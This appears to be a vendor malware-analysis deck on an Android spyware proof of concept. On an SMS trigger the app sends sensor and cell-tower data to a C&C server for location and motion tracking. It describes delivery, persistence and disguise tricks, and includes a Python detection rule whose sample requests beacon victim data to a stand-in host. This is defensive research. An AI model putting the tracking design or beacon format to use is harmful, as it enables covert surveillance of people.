  Because the client side of the malware does very little processing, the amount of data sent to the server is minimized, which reduces the chance of detection by client-side defense mechanisms. Using non-conventional device data allows the attacker to track victims located in low-connectivity or bad-signal environments such as inside buildings and even underground, as far as the cellular signal reaches.
  Diagram 1.1: Tracking victims in low-connectivity or bad-signal environments
  • 6. Suspicious Activity
  In the following sections we explain the suspicious activities of potnet malware through the code and a demonstration of the AboutAndroid.apk malware. AboutAndroid takes advantage of perfectly legitimate data that can be read without any special permission or dialog approval on the client side, which makes detecting potnet malware quite difficult. The analysed AboutAndroid sample is suspicious because of the following symptoms and runtime behaviour:
  1. It obtains private data from the system without any prior notice and without the user's approval.
  2. It obtains private data from the system without any prior notice and without any special permission.
  3. It is responsible for high battery consumption.
  One qualification to item 2: the sensor readings (accelerometer, gyroscope, barometer and so on) are indeed readable without any permission, but the SMS trigger depends on the RECEIVE_SMS permission declared in the manifest, and reading the serving cell identity through TelephonyManager requires ACCESS_COARSE_LOCATION. On the Android releases of the time (before the runtime permission model of Android 6.0) every declared permission was granted once, at install, so the user saw the same kind of permission list as for a legitimate messaging app and never saw a prompt again.
  One of the harmful aspects of the potnet malware family is that once it is on the target mobile device, it is very difficult to detect, or to know the exact trigger used to send information out of the device.
  Diagram 1.2: The cell tower (cell id), the cellphone and the signal
  • 7. Analysis
  AboutAndroid logs the user's sensor and cellular network data. Once executed, the malware registers a broadcast receiver for incoming SMS and waits for a specific text message, for example one whose body is a smiley or a question mark. When that SMS arrives, the malware logs the readings of specific sensors together with the cellular network information (cell id, LAC, MNC, MCC and so on) and sends them to the potnet C&C server. Sending only a small amount of data from the device to the C&C backend reduces the chance of detection by client-side defense mechanisms (anti-virus and other signature-based protection). Computing additional information about the victim on the server, by correlating the collected data with third-party APIs and other web services, is one of the advantages of potnets and next-generation botnets.
  This kind of attack does depend on a strong social engineering lure to convince the user to click a malicious link, or on the user being tricked into installing an app. Once that is done, AboutAndroid stays persistent on the victim device and can be triggered by SMS at any time.
  Diagram 1.3: Triangulation is calculated from the signal of every base station (cell tower)
  • 8. Malware Sample
  The diagram below shows the VirusTotal report for an AboutAndroid sample: 56 antivirus engines scanned it and all reported it clean. A clean result for a freshly built sample only says that no engine has a signature for it yet; it is not evidence that the app is benign. To look like non-malicious software, AboutAndroid uses the package namespace "com.google.aboutandroid".
  Diagram 1.4: VirusTotal scan report
  • 9. Infection
  AboutAndroid can be delivered in several ways. For example, phishing spam can lure the victim to a malicious web site where an embedded <iframe> makes the browser download a file called AboutAndroid.apk (or any other name). The user must then install it by tapping the downloaded file and walking through the manual installation process, which for an APK that does not come from the official market also requires the "Unknown sources" setting to be enabled. Other delivery channels are mobile application markets, third-party web sites and Trojan-Downloaders. Trojan-Downloaders are often carried as part of another malware's payload, such as a Trojan-Dropper, or as an attachment to spam e-mail: a message that appears to come from a well-known company with an attached invoice, say, as a .doc or .pdf document. The invoice looks innocuous enough, but it can carry a PDF reader exploit or a Microsoft Word macro that installs the malware.
  Once installed there is no application icon and no user interface to interact with, because the malware installs itself as a background service that starts only when the user unlocks the screen or when the device reboots: the service listens for the BOOT_COMPLETED and USER_PRESENT broadcast intents. The only evidence of the infection is in the "Manage Applications" section of "Settings", which shows an application called "com.google.aboutandroid" running. Uninstalling that application removes the infection.
  Diagram 2.0: Installation of the AboutAndroid malware POC
  • 10. Operation
  When the malware's service starts, it registers a broadcast receiver and a SensorEventListener inside the background service.
  Diagram 2.1: The malware registers a sensor event listener
  Once an SMS message containing ":-)" as its body arrives on the device, the app logs the infected device's sensor values and cellular network information and then opens a TCP connection to the primary potnet C&C server.
  Diagram 2.2: Check whether the SMS message contains ":-)" as its body text
  • 11. Command and Control (C&C)
  Although a fairly simple command and control protocol is used, sending the data over a plain HTTP connection, the potnet C&C server compensates for this: it is used mainly to query different APIs and web services in order to compute additional information about the physical environment of the victim device, and to triangulate from the serving cell id and the neighbouring cells' network information.
  Diagram 2.3: The C&C server's IP address
  In addition, to turn the device data into accurate motion-tracking information, the C&C server performs a geometric calculation correlated with the collected sensor data.
  Diagram 2.4: Assigning the parameter values and preparing the HTTP request to the C&C server
  The collected sensor data comes from more than seven different sensors, including the barometer, proximity sensor, linear acceleration sensor, gyroscope, temperature sensor, gravity sensor and light sensor.
  • 12. Network Impact
  The diagram below shows the HTTP request that arrives from the victim device, intercepted in our Burp proxy. The parameters the app sends are:
  client = the victim's mobile phone number.
  cid = the cell id the device is connected to.
  lac = the Location Area Code of the serving cell.
  mnc = the Mobile Network Code of the operator running the base station.
  mcc = the Mobile Country Code of the base station.
  signal = the signal strength the device receives from the base station, in dBm.
  cell_lon = the longitude of the base station antenna (before triangulation).
  cell_lat = the latitude of the base station antenna (before triangulation).
  Because the beacon is sent over plain HTTP, the same visibility that lets us intercept it with Burp is available to anyone on the network path, and the fixed set of parameter names is a usable detection fingerprint.
  Diagram 2.5: Intercepting the request from the victim device to the C&C server
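  The parameter set above can be turned into a network detection rule. The following is an added example written for this page, not code from the original analysis or from Zimperium: a small parser for raw HTTP/1.x requests and a rule that fires when a single request carries a subscriber identifier (client) together with the complete cell identity tuple (mcc, mnc, lac, cid) and a signal reading, all within plausible ranges, so that an unrelated page that happens to use a "cid" parameter does not fire. Host names, paths and every value in the sample requests are constructed; only the parameter names come from the intercepted request. The rule also covers the same fields sent as a form-encoded POST body, a trivial variation of the beacon that the page does not show.

```python
from urllib.parse import parse_qs, urlsplit

# Parameter names seen in the intercepted beacon.
CELL_PARAMS = {"cid", "lac", "mnc", "mcc", "signal"}
SUBSCRIBER_PARAM = "client"

# Constructed sample traffic: host, path and all values are made up.
BEACON_REQUEST = (
    "GET /update.php?client=%2B15550100100&cid=20481&lac=4711&mnc=10&mcc=310"
    "&signal=-87&cell_lon=-122.0840&cell_lat=37.4220 HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; Build/KOT49H)\r\n"
    "\r\n"
)
BENIGN_REQUEST = (
    "GET /search?q=cid+lac+mnc+mcc&signal=-87 HTTP/1.1\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)
POST_BEACON = (
    "POST /update.php HTTP/1.1\r\n"
    "Host: c2.example.invalid\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 63\r\n"
    "\r\n"
    "client=15550100100&cid=20481&lac=4711&mnc=10&mcc=310&signal=-87"
)


def parse_request(raw):
    """Split a raw HTTP/1.x request into (method, host, path, params).
    params merges the query string and, for form POSTs, the body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    split = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(split.query).items()}
    if body and headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        params.update({k: v[0] for k, v in parse_qs(body).items()})
    return method, headers.get("host", ""), split.path, params


def _int_in(params, key, lo, hi):
    """True when params[key] is an integer within [lo, hi]."""
    try:
        return lo <= int(params[key]) <= hi
    except (KeyError, ValueError):
        return False


def is_potnet_beacon(params):
    """Fingerprint: subscriber identifier plus the full cell identity tuple and a
    signal reading in one request, with every value in a plausible range."""
    if not CELL_PARAMS.issubset(params) or SUBSCRIBER_PARAM not in params:
        return False
    digits = "".join(ch for ch in params[SUBSCRIBER_PARAM] if ch.isdigit())
    return (
        7 <= len(digits) <= 15                      # E.164 numbers have at most 15 digits
        and _int_in(params, "mcc", 200, 799)        # assigned MCC range
        and _int_in(params, "mnc", 0, 999)          # 2- or 3-digit MNC
        and _int_in(params, "lac", 1, 0xFFFE)       # 16-bit LAC; 0 and 0xFFFF are reserved
        and _int_in(params, "cid", 1, 0x0FFFFFFF)   # 16-bit GSM/UMTS CID up to 28-bit LTE ECI
        and _int_in(params, "signal", -140, -20)    # dBm; anything else is not a real RSSI
    )


def scan(requests):
    """Run the fingerprint over captured requests and return one alert per beacon
    with the fields an analyst would pivot on (C&C host, victim number, cell)."""
    alerts = []
    for raw in requests:
        method, host, path, params = parse_request(raw)
        if is_potnet_beacon(params):
            alerts.append({
                "method": method, "host": host, "path": path,
                "client": params["client"],
                "mcc_mnc": params["mcc"] + "-" + params["mnc"],
                "cell": params["lac"] + "/" + params["cid"],
            })
    return alerts


if __name__ == "__main__":
    for alert in scan([BEACON_REQUEST, BENIGN_REQUEST, POST_BEACON]):
        print("potnet beacon:", alert)
```

  The value-range checks matter more than the parameter names: an attacker can rename fields in the next build, but a beacon that still needs to deliver a valid MCC/MNC/LAC/CID tuple and a dBm reading keeps the same shape, and the same ranges can be reused against whatever names appear in the next intercepted request.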
  • 13. Proof-of-Concept
  After launching one of the malware's hidden activities (not the main one) we can see what it looks like in the diagram below. The AboutAndroid malware POC is installed on the victim device and we are ready to begin our simple scenario.
  Diagram 3.0: AboutAndroid malware POC, an activity launched (not in hidden mode)
  1. To track the victim, the attacker sends an SMS message with the trigger text “” to the victim device (the check shown on slide 10 matches ":-)").
  Diagram 3.1: The attacker sends the SMS message
  • 14.
  2. The victim receives the SMS message. We cannot observe any suspicious activity on the victim device.
  Diagram 3.2: No suspicious activity on the victim device
  Diagram 3.3: The victim device receiving the SMS message
  3. The attacker can now browse to the AboutAndroid potnet C&C server GUI console and retrieve all the relevant information about the victim.
  Diagram 3.4: AboutAndroid potnet C&C server, part 1: basic information, indicators and the Motion Detection module
  • 15.
  In diagram 3.4 we can see the basic information about our victim: cellular network information, radio signal data, the calculated device location, an "inside building" indicator, a floor level indicator, and so on. In addition, we can see the Motion Detection module (bottom right corner). The Motion Detection module shows every movement of the victim device, updated by each new movement of our human target.
  TIP: search the internet for the full video clip of this proof-of-concept demonstration to see the complete feature list of the AboutAndroid malware.
  In diagram 3.5 we can see the calculated data for the victim, including the triangulation data, the base-station measurements and the estimated location of the victim device.
  Diagram 3.5: AboutAndroid potnet C&C server, part 2: calculated data for the victim
  • 16. Conclusions
  A standard antivirus sweep will not get rid of AboutAndroid or other potnet malware, and since the program does not make its presence known, you may be in trouble if you find that you are already infected. If you think you may have been infected by potnet malware, uninstall any suspicious app you are not familiar with; otherwise wipe the device and perform a factory reset.
  In my opinion, potnet malware gains its advantage over the victim device by implementing an incoming broadcast receiver, sensor listeners and other non-conventional data sources, which let the malware run in a fairly stealthy mode and obtain information from the victim device without interrupting the user or needing any approval dialog on the client side. AboutAndroid runs in the background as a service and its operation is not noticeable to the user. However, it will likely consume considerable battery power when active, which may raise suspicion. On the other hand, users with a capped data plan will hardly notice any change on their bill. Once a specific app has been detected and a signature written for it, most mobile anti-virus products will be able to detect and remove the threat by uninstalling the malicious app.
  Notes for Android developers and the Google security team: giving applications direct access to hardware is dangerous. Sensor access should be gated by permissions. In addition, the hardware layer should not provide more than applications require, and should expose abstractions rather than raw data.
  • 17. http://www.zimperium.com www.zimperium.com, ZIMPERIUM and Zimperium logo are trademarks of ZIMPERIUM Inc. All other trademarks are the property of their respective owners. The information presented is subject to change without notice. ZIMPERIUM assumes no responsibility for inaccuracies contained herein. Copyright © 2015 ZIMPERIUM Inc. All rights reserved.